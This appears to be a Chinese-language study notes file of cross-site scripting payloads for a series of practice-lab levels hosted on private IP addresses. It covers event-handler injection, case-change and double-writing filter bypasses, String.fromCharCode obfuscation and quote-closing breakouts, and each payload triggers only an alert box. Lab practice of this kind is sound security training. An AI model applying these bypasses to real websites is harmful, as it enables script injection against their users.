xss
第一题
<script>alert('xss')</script>
<iframe src=javascript:alert('xss')></iframe>
<a href=javascript:alert('xss')>ggtest</a>
<img src=1 onerror=alert('xss')>
http://10.211.55.16/xss/example1.php?name=<button type="button" onclick=alert('xss')>通过按钮点击触发xss</button> <font size="4" color="blue" onmouseover=alert('xss')> 移动到元素触发xss </font> <br>
<select> <option onclick=alert('x')>onclick点击触发事件</option> <option values=1 onmousedown=alert('ss')>onmousedown触发</option></select> <a href=javascript:alert('xss')>利用a标签的href属性触发</a> <br>
<textarea placeholder=国光的xss测试:键盘按键触发xss onkeypress=alert('xss')></textarea>
第二题
<Script>alert(1);</Script>#大小写转换
其他是第一题的
第三题 双写
<img src=1 onerror=alert('xss')>
<sc<script>ript>alert('xss')</sc</script>ript>
第四题 标签绕过
<img src=1 onerror=alert('xss')>
第五关 过滤alert //String.fromCharCode
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
第六关 闭合
111";</script><script>alert(1)</script>//
第七题 闭合过滤<>使用alert
alert';onclick=alert('xss')//
第八关
http://192.168.233.147/xss/example8.php/"><img src=1 onerror=alert('xss')><from